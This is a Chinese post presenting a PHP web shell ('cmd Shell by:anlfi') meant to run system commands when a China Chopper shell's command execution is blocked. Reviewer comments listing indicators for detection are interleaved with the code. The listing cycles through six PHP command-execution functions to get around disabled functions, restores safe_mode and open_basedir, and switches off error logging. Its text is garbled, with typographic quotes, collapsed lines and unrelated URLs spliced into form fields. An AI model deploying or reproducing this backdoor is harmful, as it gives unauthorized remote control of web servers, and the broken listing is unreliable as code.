当webshell不可执行cmdshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令
<?php/*==============*/
/*
 * REVIEW (defensive reading of this listing)
 *
 * What it is: a single-file page with a login form that hands the `cmd`
 * request parameter to exec_all() and prints the result in a textarea,
 * i.e. a web shell.
 *
 * State of the text: the listing was extracted with typographic quote
 * characters and with its line breaks collapsed, so it is not valid PHP
 * as shown.
 *
 * Traits visible in this file that a defender can match on when scanning a
 * web root or reviewing logs:
 *   - error_reporting(0), error_log set to NULL and log_errors set to 0
 *   - ini_restore() on safe_mode and open_basedir
 *   - function_exists() probes for exec, shell_exec, popen, system,
 *     passthru and proc_open inside one helper
 *   - page title "cmd Shell by:anlfi"
 *   - mail subject "Shell Accessed -- Ani-Shell --"
 *
 * NOTE(review): $lock, $tracebackFeature, $ownerEmail, $url and $self are
 * read below but never assigned in the visible text; presumably a
 * configuration section was lost when the page was published -- confirm
 * against the original file before relying on any statement about them.
 */
error_reporting(0);ini_set(‘max_execution_time‘,0);// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\/**************** Defines *********************************/$user = "anlfi";$pass = "XXX";$sm = @ini_get(‘safe_mode‘);$SEPARATOR = ‘/‘; // Default Directory separator$os = "N/D";if(stristr(php_uname(),"Windows")){ $SEPARATOR = ‘\\‘; $os = "Windows";}else if(stristr(php_uname(),"Linux")){ $os = "Linux";}//*************************************************************/// -------------- Traceback Functions/* REVIEW: sendLoginAlert() is called from the login check only when $tracebackFeature == 'On'; it calls mail() to $ownerEmail with the subject string below, which is a searchable indicator in outbound mail logs. */function sendLoginAlert(){ global $ownerEmail; global $url; $accesedIp = $_SERVER[‘REMOTE_ADDR‘]; $randomInt = rand(0,1000000); # to avoid id blocking $from = "ani-shell$[email]randomInt@fbi.gov[/email]"; //echo $from; if(function_exists(‘mail‘)) { $subject = "Shell Accessed -- Ani-Shell --"; $message = "Hey Owner , Your Shell(Ani-Shell) located at $url was accessed by $accesedIp If its not you :- 1. Please check if the shell is secured. 2. Change your user name and Password. 3. Check if lock is 0n! and Kick that ****** out! 
Thanking You Yours FaithfullyAni-Shell "; mail($ownerEmail,$subject,$message,‘From:‘.$from); }}//---------------------------------------------------------if(function_exists(‘session_start‘) && $lock == ‘on‘){ session_start();}else{ // The lock will be set to ‘off‘ if the session_start fuction is disabled i.e if sessions are not supported $lock = ‘off‘;}//logoutif(isset($_GET[‘logout‘]) && $lock == ‘on‘){ $_SESSION[‘authenticated‘] = 0; session_destroy(); header("location: ".$_SERVER[‘PHP_SELF‘]);}ini_set(‘max_execution_time‘,0);/***************** Restoring *******************************//* REVIEW: ini_restore() resets safe_mode and open_basedir to their configured values, and the lines that follow set error_log to NULL and log_errors to 0 for this request. PHP's own error log will therefore not record this script's failures; web-server access logs and host process telemetry are the sources to rely on. safe_mode itself was removed in PHP 5.4. */ini_restore("safe_mode");ini_restore("open_basedir");if(function_exists(‘ini_set‘)){ ini_set(‘error_log‘,NULL); // No alarming logs ini_set(‘log_errors‘,0); // No logging of errors}else{ ini_alter(‘error_log‘,NULL); ini_alter(‘log_errors‘,0);}// ----------------------------------------------------------------------------------------------------------------?><html><head><title>cmd Shell by:anlfi</title><style>/*========================== CSS Section==========================*/*{ padding:0; margin:0;}.alert{ background:red; color:white; font-weight:bold;}td.info{ width:0px;}.bind { border: 1px solid #333333; margin: 15px auto 0; font-size: small;}div.end *{ font-size:small;}div.end { width:100%; background:#222;}p.blink{ text-decoration: blink;}body { background-color:black; color:rgb(35,182,39); font-family:Tahoma,Verdana,Arial; font-size: small;}input.own { background-color: Green; color: white; border : 1px solid #ccc;}blockquote.small{ font-size: smaller; color: silver; text-align: center;}table.files{ border-spacing: 10px; font-size: small;}h1 { padding: 4px; padding-bottom: 0px; margin-right : 5px;}div.logo{ border-right: 1px aqua solid;}div.header{ padding-left: 5px; font-size: small; text-align: left;}div.nav{ margin-top:1px; height:30px; background-color: #ccc;}div.nav ul{ list-style: none; padding: 4px;}div.nav li{ float: left; margin-right: 10px; 
text-align:center;}textarea.cmd{ border : 1px solid #111; background-color : green; font-family: Shell; color : white; margin-top: 10px; font-size:small;}input.cmd{ background-color:black; color: white; width: 400px; border : 1px solid #ccc;}td.maintext{ font-size: large;}#margins{ margin-left: 10px; margin-top: 10px; color:white;}table.top{ border-bottom: 1px solid aqua; width: 100%;}#borders{ border-top : 1px solid aqua; border-left:1px solid aqua; border-bottom: 1px solid aqua; border-right: 1px solid aqua; margin-bottom:0;}td.file a , .file a{ color : aqua; text-decoration:none;}a.dir{ color:white; font-weight:bold; text-decoration:none;}td.dir a{ color : white; text-decoration:none;}td.download,td.download2{ color:green;}#spacing{ padding:10px; margin-left:200px;}th.header{ background: none repeat scroll 0 0 #191919; color: white; border-bottom : 1px solid #333333;}p.warning{ background : red; color: white;}//--------------------------------CSS END------------------------------------------------------*/</style></head><body text="rgb(39,245,10)" bgcolor="black"><?php/* REVIEW: the posted user/pass are compared with the hard-coded $user and $pass only while $lock == 'on'. $lock is not assigned anywhere in the visible text; if that also holds for the original file, the earlier else-branch sets it to 'off' and the page prints its own warning that anyone can use it, so a copy left on a server is reachable by any visitor who finds the URL, not only by whoever placed it. */if(isset($_POST[‘user‘]) && isset($_POST[‘pass‘]) && $lock == ‘on‘){ if( $_POST[‘user‘] == $user && $_POST[‘pass‘] == $pass ) { $_SESSION[‘authenticated‘] = 1; // --------------------- Tracebacks -------------------------------- if($tracebackFeature == ‘On‘) { sendLoginAlert(); } // ------------------------------------------------------------------ }}if($lock == ‘off‘){?> <p class="warning"><b>Lock is Switched Off! 
, The shell can be accessed by anyone!</b></p><?php}if($lock == ‘on‘ && (!isset($_SESSION[‘authenticated‘]) || $_SESSION[‘authenticated‘]!=1) ){?><table> <tbody> <tr> <td width="500px"> <pre><font color="Orange"><b>[]--------------cmd Shell-----------------</b></pre> </td> <td> <!-- <h1><?php // echo $greeting;?></h1> <img src="http://www.mamicode.com/Logo_03.png" class="imageForm" /> --> <form method="POST" action="<?php echo $_SERVER[‘PHP_SELF‘];?>"> <input name="user" value="http://www.mamicode.com/Username"/> <input name="pass" type="" value=""/> <input class="own" type="Submit" value="http://www.mamicode.com/in!"/> </form> </td> </tr> </tbody></table><?php}//---------------------------------- We are authenticated now-------------------------------------//Launch the shellelse { //---------------------------------- Fuctions --------------------------------------------------- function showDrives() { global $self; foreach(range(‘A‘,‘Z‘) as $drive) { if(is_dir($drive.‘:\\‘)) { ?> <a class="dir" href=http://www.mamicode.com/‘<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>‘> <?php echo $drive.":\\" ?> </a> <?php } } } function HumanReadableFilesize($size) { $mod = 1024; $units = explode(‘ ‘,‘B KB MB GB TB PB‘); for ($i = 0; $size > $mod; $i++) { $size /= $mod; } return round($size, 2) . ‘ ‘ . 
$units[$i]; }function getClientIp(){ echo $_SERVER[‘REMOTE_ADDR‘];}function getServerIp(){ echo getenv(‘SERVER_ADDR‘);}function getSoftwareInfo(){ echo php_uname();}function diskSpace(){ echo HumanReadableFilesize(disk_total_space("/"));}function freeSpace(){ echo HumanReadableFilesize(disk_free_space("/"));}function getSafeMode(){ global $sm; echo($sm?"ON :( :‘( (Most of the Features will Not Work!)":"OFF"); }function getDisabledFunctions(){ if(!ini_get(‘disable_functions‘)) { echo "None"; } else { echo @ini_get(‘disable_functions‘); }}function getFilePermissions($file){ $perms = fileperms($file);if (($perms & 0xC000) == 0xC000) { // Socket $info = ‘s‘;} elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = ‘l‘;} elseif (($perms & 0x8000) == 0x8000) { // Regular $info = ‘-‘;} elseif (($perms & 0x6000) == 0x6000) { // Block special $info = ‘b‘;} elseif (($perms & 0x4000) == 0x4000) { // Directory $info = ‘d‘;} elseif (($perms & 0x2000) == 0x2000) { // Character special $info = ‘c‘;} elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = ‘p‘;} else { // Unknown $info = ‘u‘;}// Owner$info .= (($perms & 0x0100) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0080) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? ‘s‘ : ‘x‘ ) : (($perms & 0x0800) ? ‘S‘ : ‘-‘));// Group$info .= (($perms & 0x0020) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0010) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? ‘s‘ : ‘x‘ ) : (($perms & 0x0400) ? ‘S‘ : ‘-‘));// World$info .= (($perms & 0x0004) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0002) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? ‘t‘ : ‘x‘ ) : (($perms & 0x0200) ? 
‘T‘ : ‘-‘));return $info;}/***********************************************************/// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is// Turned OfF!/**********************************************************//* REVIEW: exec_all() uses the first of exec, shell_exec, popen, system, passthru and proc_open for which function_exists() returns true, so a disable_functions list that names only some of them leaves the others usable; hardening has to cover all six. The collected output is passed through htmlspecialchars() before it is returned. */function exec_all($command){ $output = ‘‘; if(function_exists(‘exec‘)) { exec($command,$output); $output = join("\n",$output); } else if(function_exists(‘shell_exec‘)) { $output = shell_exec($command); } else if(function_exists(‘popen‘)) { $handle = popen($command , "r"); // Open the command pipe for reading if(is_resource($handle)) { if(function_exists(‘fread‘) && function_exists(‘feof‘)) { while(!feof($handle)) { $output .= fread($handle, 512); } } else if(function_exists(‘fgets‘) && function_exists(‘feof‘)) { while(!feof($handle)) { $output .= fgets($handle,512); } } } pclose($handle); } else if(function_exists(‘system‘)) { ob_start(); //start output buffering system($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists(‘passthru‘)) { ob_start(); //start output buffering passthru($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists(‘proc_open‘)) { $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to ); $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array ‘pipes‘ if(is_resource($handle)) { if(function_exists(‘fread‘) && function_exists(‘feof‘)) { while(!feof($pipes[1])) { $output .= fread($pipes[1], 512); } } else if(function_exists(‘fgets‘) && function_exists(‘feof‘)) { while(!feof($pipes[1])) { $output .= fgets($pipes[1],512); } } } pclose($handle); } else { $output = "They have their Security there! 
:( "; } return(htmlspecialchars($output)); }function magicQuote($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text);}//------------------------------------------------------------------------------------------------?></div><div class="nav"><ul> <li><a href="http://www.mamicode.com/<?php echo $self.‘?shell‘;?>">Shell</a></li> <?php if($lock == ‘on‘) { ?> <li><a href="http://www.mamicode.com/<?php echo $self.‘?logout‘?>">I m Out!</a></li> <?php } ?></ul></div>/////////by:Anlfi//////////<?php//-------------------------------- Check what he wants -------------------------------------------// Shell/* REVIEW: the command is taken from the `cmd` query parameter whenever `shell` is present, and the form below submits with GET, so every command is part of the request URL. Web-server access logs therefore record requests carrying both `shell` and `cmd=` parameters, which is a usable signal for detection and for reconstructing activity after the fact. */if(isset($_GET[‘shell‘])){ if(!isset($_GET[‘cmd‘]) || $_GET[‘cmd‘] == ‘‘) { $result = ""; } else { $result=exec_all($_GET[‘cmd‘]); } ?> <textarea class="cmd" cols="100" rows="20"><?php echo $result;?></textarea> <form action="<?php echo $self;?>" method="GET"> <!-- For Shell --> <input name="shell" type="hidden" /> <!-- For CMD --> <input name="cmd" class="cmd" /> <input name="submit" value="http://www.mamicode.com/Run!" class="own" type="submit" /> </form> <?php }}?>
菜刀下默认执行效果
此脚本测试效果